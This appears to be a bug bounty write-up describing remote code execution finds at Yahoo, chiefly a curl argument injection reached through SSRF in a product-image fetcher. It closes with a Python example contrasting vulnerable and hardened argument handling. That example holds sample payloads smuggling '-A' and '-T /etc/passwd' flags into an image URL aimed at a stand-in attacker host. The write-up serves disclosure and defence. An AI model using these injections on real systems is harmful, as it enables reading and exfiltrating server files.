How I found 2.9 RCE at Yahoo! Bug Bounty program

Foreword

Yahoo's Bug Bounty program includes a lot of services, and I decided to work on Brightroll.

First RCE

I started with the usual first step in bug hunting: reconnaissance. Nothing unusual there: Google, Aquatone, etc.

[Screenshots: queue list; message list; strange form; window that looks like a terminal; Brightroll RCE]

Second RCE

Actually, it was an RCE through the same service as the first one.

Third ALMOST RCE

This vulnerability is the most interesting of all my finds. I started my research of the Yahoo Small Business store after creating a few products, so that I had access to the functions related to them. While exploring the functionality, I noticed that when I visited the email templates page, AJAX sent a few requests to get the paths of the product images shown on the page. One of the requests was sent to objinfo_data.php with an id parameter. I assumed this script was used to resize product images.

This part is important: when I created a product, I noticed that the request used to create it contained a couple of URLs to images, not the binary image data itself. My guess was: what if the script fetches the product image from that link and uses it for resizing? I thought it might be SSRF. I edited the product, changed the image URL to my host and port, and ran netcat. Then I used the product id of that product in a request to objinfo_data.php. Netcat showed me the request, and I noticed that the User-Agent was curl.

After that I tried to get RCE every way I could think of, with no result :( It just wasn't working. After all my torment I decided to ask my colleagues about it. One of them suggested trying "-A something": if I saw "User-Agent: something" in the request in netcat, it would be possible to inject into the argument string. I tried it and it worked! Then another colleague immediately suggested the -T flag (--upload-file). This flag reads a file from the file system and attaches it to the request. I used it and was able to read /etc/passwd.
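To make the bug class concrete, here is an added example (my own code, not Yahoo's and not the script from the post) that models a server-side image fetcher shelling out to curl. The vulnerable version concatenates the stored image URL into a command line that the shell splits, which is what lets "-A something" become a User-Agent option and "-T /etc/passwd" upload a local file. The hardened version validates the URL, passes an argv list with no shell, and puts "--" before the URL so curl can never parse it as an option. The script name objinfo_data.php comes from the post; the function names and the attacker host are assumptions for illustration.

```python
"""Model of a curl argument injection in a product-image fetcher.

Constructed example: the function names, the attacker host and the
exact curl flags are assumptions, not the code behind objinfo_data.php.
"""
import shlex
from urllib.parse import urlsplit


def vulnerable_curl_argv(image_url: str) -> list:
    """Weak pattern: build one command string and let the shell split it.

    shlex.split reproduces what /bin/sh does with the unquoted URL.
    Anything after a space in the stored image URL becomes its own
    argv entry, so "-A something" and "-T /etc/passwd" reach curl as
    real options. (Even escapeshellarg-style quoting is not enough on
    its own: curl accepts "-Avalue" as one token.)
    """
    return shlex.split(f"curl -s {image_url}")


class UnsafeFetchUrl(ValueError):
    """Raised when the stored image URL must not be handed to curl."""


def validate_fetch_url(image_url: str) -> str:
    """Allow only absolute http(s) URLs that have a host.

    Rejects option-looking strings ("-A ...", "-T ...") and non-HTTP
    schemes such as file:// that curl would otherwise happily fetch.
    """
    if image_url.startswith("-"):
        raise UnsafeFetchUrl("image URL looks like a curl option")
    parts = urlsplit(image_url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise UnsafeFetchUrl("only absolute http(s) URLs may be fetched")
    return image_url


def hardened_curl_argv(image_url: str) -> list:
    """argv meant for exec without a shell.

    All options come first; "--" ends option parsing, so the final
    token is always treated as a URL even if it contains spaces or
    starts with a dash. --proto pins curl to http/https. Note that this
    closes the argument injection only; the fetch itself is still an
    SSRF primitive unless the destination host is also restricted.
    """
    url = validate_fetch_url(image_url)
    return ["curl", "-s", "--max-time", "10",
            "--proto", "=http,https", "--", url]


if __name__ == "__main__":
    # Constructed attacker-controlled image URLs, as stored on a product.
    for payload in ("http://attacker.example:4444/ -A something",
                    "http://attacker.example:4444/ -T /etc/passwd",
                    "-T /etc/passwd"):
        print("vulnerable:", vulnerable_curl_argv(payload))
        try:
            print("hardened:  ", hardened_curl_argv(payload))
        except UnsafeFetchUrl as exc:
            print("hardened:   rejected:", exc)
```

In the vulnerable path the attacker's tokens land in argv exactly as the post describes; in the hardened path the same string is either rejected or passed as a single URL token after "--", where curl will not interpret it as a flag.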

[Screenshot: Yahoo Small Business curl argument injection]
